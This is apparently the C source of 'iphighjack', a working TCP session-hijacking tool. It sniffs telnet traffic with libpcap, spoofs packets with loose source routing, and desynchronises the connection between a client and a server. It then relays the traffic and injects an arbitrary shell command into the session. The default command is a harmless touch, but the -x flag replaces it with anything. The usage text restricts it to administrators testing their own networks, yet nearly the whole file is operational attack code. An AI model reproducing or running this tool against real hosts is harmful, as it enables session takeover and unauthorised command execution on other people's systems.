/* iphighjacking example 
   If you have any questions about this: provos@physnet.uni-hamburg.de

   This code utilizes libpcap
 */

/* Use our ip/tcp routines */
#include "tcp.h"
#include "mysignal.h"

#define MAXNAME 255

u_long seq_next, offset, seq;
struct sockaddr_in your, from, unreach, *to;

char string[MAXNAME];
int length = 0;

char sourcename[MAXNAME];
char hostname[MAXNAME];
char yourname[MAXNAME];

/* Wow, this is great programming style, make all vars global
   wish I were back to good old cobol */

char telnet_filter[MAXNAME];
ulong serv_seq_0, serv_seq_1, serv_off;
ulong cli_seq_0, cli_seq_1, cli_off;
ulong cli_seq = 0, serv_ack = 0;
ulong new_cli_seq = 0, new_serv_ack = 0;
ushort dport, sport;
short cli_id = 0, serv_id = 0;


struct tcphdr my_tcp;
struct in_addr *src_route[2];
struct in_addr nullhost;

int n;
int insert_cmd = 0;

void usage()
{
	Fprintf(stderr,
		"USAGE: iphighjack [-d] server client you\n\n"
		"\tserver: server host to make a connection with.\n"
		"\tclient: client who starts a connection.\n"
		"\tyou:    your own ip number.\n"
	"This programm is meant to be used in a controlled environment\n"
	"Its sole perpuse is for administrators to check their network\n"
	     "setup. DO NOT USE THIS PROGRAMM AGAINST HOSTS YOU DO NOT\n"
		"ADMINISTRATE!!!\n"

	    );
	exit(1);
}

void sig_stop(int signo)
{
	insert_cmd = 1;
	return_now = 1;		/* And still bad coding style, but so is life */
}

static INLINE void insert_in_stream(char *cmd_buf, int cmd_len)
{
	do {
		send_source_tcp(to->sin_addr, dport,
				from.sin_addr, sport,
				TH_PUSH | TH_ACK,
				cli_seq,
				serv_ack,
				(char *) cmd_buf,
				cmd_len,
				LSRR, 8, src_route);
		new_serv_ack = wait_tcp_anwser(to->sin_addr, dport,
					       from.sin_addr, sport);
		new_cli_seq = ntohl(tcph->th_ack);
	} while (new_cli_seq < cli_seq + cmd_len);
	do {
		new_serv_ack = wait_tcp_anwser(to->sin_addr, dport,
					       from.sin_addr, sport);
		serv_id = iph->ip_id;
	} while (new_serv_ack < serv_ack + cmd_len);
	print_tcp_data(FALSE);

	/* Ack the response what ever it is */
	if (new_serv_ack > serv_ack)
		send_source_tcp(to->sin_addr, dport,
				from.sin_addr, sport,
				TH_ACK,
				new_cli_seq,
				new_serv_ack,
				NULL, 0,
				LSRR, 8, src_route);

	/* fix the offsets */
	Fprintf(stdout, "d serv ack: %lu\n", new_serv_ack - serv_ack);
	serv_off += new_serv_ack - serv_ack;
	serv_ack = new_serv_ack;
	Fprintf(stdout, "d cli seq : %lu\n", new_cli_seq - cli_seq);
	cli_off += new_cli_seq - cli_seq;
	cli_seq = new_cli_seq;
}

int main(int argc, char *argv[])
{
	extern char *optarg;
	extern int optind;

	struct hostent *tmp;
	char *cmd = "touch ~/HIJACK_SUCCEED; ";
	int ch, check_only = 0, i;

	nullhost.s_addr = 0;

	seq = 1234 + getpid();
	sport = 0;		/* On this port is rlogin */

	debug = 0;

	while ((ch = getopt(argc, argv, "?cdx:")) != EOF)
		switch (ch) {
		case 'x':
			cmd = optarg;
			break;
		case 'd':
			debug++;
			break;
		case 'c':
			check_only = 1;
			break;
		case '?':
		default:
			usage();
		}

	if (argc - optind < 3 || geteuid() != 0)
		usage();


	/* Get IP-Addresses for the different hosts */

	strncpy(hostname, argv[optind], MAXNAME);
	strncpy(sourcename, argv[optind + 1], MAXNAME);
	strncpy(yourname, argv[optind + 2], MAXNAME);

	tmp = resolve_ip(hostname);

	(void) bzero((char *) &whereto, sizeof(struct sockaddr));
	to = (struct sockaddr_in *) &whereto;
	to->sin_family = tmp->h_addrtype;
	bcopy(tmp->h_addr, (caddr_t) & to->sin_addr, tmp->h_length);

	Dprintf(stdout, "%s(%s)\n", hostname, inet_ntoa(to->sin_addr));

	tmp = resolve_ip(sourcename);

	(void) bzero((char *) &from, sizeof(struct sockaddr));
	from.sin_family = tmp->h_addrtype;
	bcopy(tmp->h_addr, (caddr_t) & from.sin_addr, tmp->h_length);

	Dprintf(stdout, "%s(%s)\n", sourcename, inet_ntoa(from.sin_addr));

	tmp = resolve_ip(yourname);

	(void) bzero((char *) &your, sizeof(struct sockaddr));
	your.sin_family = tmp->h_addrtype;
	bcopy(tmp->h_addr, (caddr_t) & your.sin_addr, tmp->h_length);

	Dprintf(stdout, "%s(%s)\n", yourname, inet_ntoa(your.sin_addr));


	Fprintf(stdout, "Hijacking: %s -> %s\n", sourcename, hostname);

	if (!make_pcap_hook())
		exit(1);

	if (!make_raw_socket())
		exit(1);

	if (!check_reach(to->sin_addr, your.sin_addr)) {
		Fprintf(stderr, "%s is not reachable!\n", hostname);
		if (!check_only)
			exit(1);
	} else if (check_only)
		Fprintf(stderr, "%s is reachable!\n", hostname);


	if (check_reach(from.sin_addr, your.sin_addr)) {
		Fprintf(stderr, "Client host %s reachable\n", sourcename);
	} else {
		Fprintf(stderr, "Client %s is not reachable!\n", sourcename);
		if (!check_only)
			exit(1);
	}

	if (check_source_route(to->sin_addr, from.sin_addr,
			       your.sin_addr)) {
		Fprintf(stderr, "Loose source routing possible\n");
	} else {
		Fprintf(stderr, "Loose source routing not possible\n");
		if (!check_only)
			exit(1);
	}

	Fprintf(stdout, "Cmd buffer is: %s\n", cmd);


	if (check_reach(to->sin_addr, from.sin_addr)) {
		Fprintf(stderr, "Hijacking possible.\n");
	} else {
		Fprintf(stderr, "Hijacking not possible.\n");
		if (!check_only)
			exit(1);
	}

	sprintf(telnet_filter, "(src %s and (dst %s or dst %s) "
		"and src port 23) "
		"or (src %s and dst %s and dst port 23)",
		hostname, sourcename, yourname,
		sourcename, hostname);

	Dprintf(stdout, "Using filter %s\n", telnet_filter);

	if (set_pcap_filter(telnet_filter) < 0) {
		Fprintf(stderr, "Can't set pcap filter.\n");
		exit(1);
	}
	if (check_only) {
		close_raw_socket();
		return;
	}
	/* Send a loose source routed packet */

	src_route[0] = &your.sin_addr;
	src_route[1] = NULL;

	my_tcp = wait_tcp(to->sin_addr, 23, from.sin_addr, 0, TH_SYN | TH_ACK);
	serv_seq_0 = ntohl(my_tcp.th_seq);
	cli_seq_0 = ntohl(my_tcp.th_ack);
	sport = ntohs(my_tcp.th_dport);
	dport = 23;

	send_tcp_simple(to->sin_addr, dport,
			from.sin_addr, sport,
			TH_RST, cli_seq_0, serv_seq_0 + 1, NULL, 0);

	/* Here we start the spoofed connection and get back the seq via lsrr */
	send_source_tcp(to->sin_addr, dport,
			from.sin_addr, sport,
	  TH_SYN, cli_seq_0 - 1 + 64000, 0, NULL, 0, LSRR, 8, src_route);

#ifdef DEBUG
	Fprintf(stdout, "Got Syn: %lu Ack: %lu\n", serv_seq_0, cli_seq_0);
#endif

	/* We need to know the offset to calculate the right numbers
	   later */

	cli_seq_0--;
	cli_seq_1 = cli_seq_0 + 64000;
	cli_off = cli_seq_1 - cli_seq_0;


	/* Wait for the SYN_ACK */

	my_tcp = wait_tcp(to->sin_addr, dport,
			  from.sin_addr, sport,
			  TH_SYN | TH_ACK);


	/* Now we got both pairs and can negotiate between the hosts */
	serv_seq_1 = ntohl(my_tcp.th_seq);
	serv_off = serv_seq_1 - serv_seq_0;
#ifdef DEBUG
	Fprintf(stdout, "Got Syn: %lu Ack: %lu\n", serv_seq_1, cli_seq_1);
#endif

	/* Ack the inbetween connection, from now on we parse */
	send_source_tcp(to->sin_addr, dport,
			from.sin_addr, sport,
			TH_ACK, cli_seq_1 + 1, serv_seq_1 + 1,
			NULL, 0, LSRR, 8, src_route);


	mysignal(SIGTSTP, sig_stop);

#define DATALEN (ntohs(iph->ip_len) - (my_tcp.th_off<<2) - (iph->ip_hl<<2))

	for (i = 0; i < 10;) {
		if (insert_cmd) {
			Fprintf(stdout, "Inserting command...\n");
			fflush(stdout);
			Fprintf(stdout, "DONT ECHO\n");
			insert_in_stream(cmd, strlen(cmd));
			Fprintf(stdout, "End of insert...\n");
			insert_cmd = 0;
		}
		/* This is only the header, the rest of the data
		   is in tcph */
		my_tcp = wait_tcp(nullhost, 0, nullhost, 0, 0);
		/* This is set in the signal handler and in wait_tcp */
		if (return_now)
			continue;
#ifdef DEBUG
		Fprintf(stdout, "%d > %d: %d bytes",
			ntohs(my_tcp.th_sport),
			ntohs(my_tcp.th_dport),
			DATALEN);
#endif
		if (i)
			i++;

		if (my_tcp.th_sport == htons(sport) &&
		    iph->ip_hl == 5 && cli_id != iph->ip_id) {
			cli_id = iph->ip_id;
			/* data from client site */
			if (tcph->th_flags & (TH_RST | TH_FIN))
				i++;
#ifdef DEBUG
			Fprintf(stdout, "C->S\n");
#endif
			/* Client site */
			serv_ack = ntohl(my_tcp.th_ack) + serv_off;
			send_source_tcp(to->sin_addr, dport,
					from.sin_addr, sport,
					my_tcp.th_flags,
					ntohl(my_tcp.th_seq) + cli_off,
					serv_ack,
					(char *) tcph + my_tcp.th_off * 4,
					DATALEN,
					LSRR, 8, src_route);
		} else if (my_tcp.th_sport == htons(dport) &&
			   iph->ip_hl > 5 && serv_id != iph->ip_id) {
			serv_id = iph->ip_id;
			/* data from server site */
			if (tcph->th_flags == TH_RST)
				i++;
			print_tcp_data(TRUE);

#ifdef DEBUG
			Fprintf(stdout, "S->C\n");
#endif
			cli_seq = ntohl(my_tcp.th_ack);
			/* Server site */
			send_tcp_simple(from.sin_addr, sport,
					to->sin_addr, dport,
					my_tcp.th_flags,
					ntohl(my_tcp.th_seq) - serv_off,
					cli_seq - cli_off,
					(char *) tcph + my_tcp.th_off * 4,
					DATALEN);
		}
		fflush(stdout);
	}

	mysignal(SIGSTOP, SIG_DFL);

	/* Reset the connection */
	send_source_tcp(to->sin_addr, 23,
			from.sin_addr, ntohs(my_tcp.th_dport),
	      TH_RST, cli_seq_0 + 64000, 0, NULL, 0, LSRR, 8, src_route);


	close_raw_socket();
	return 1;
}
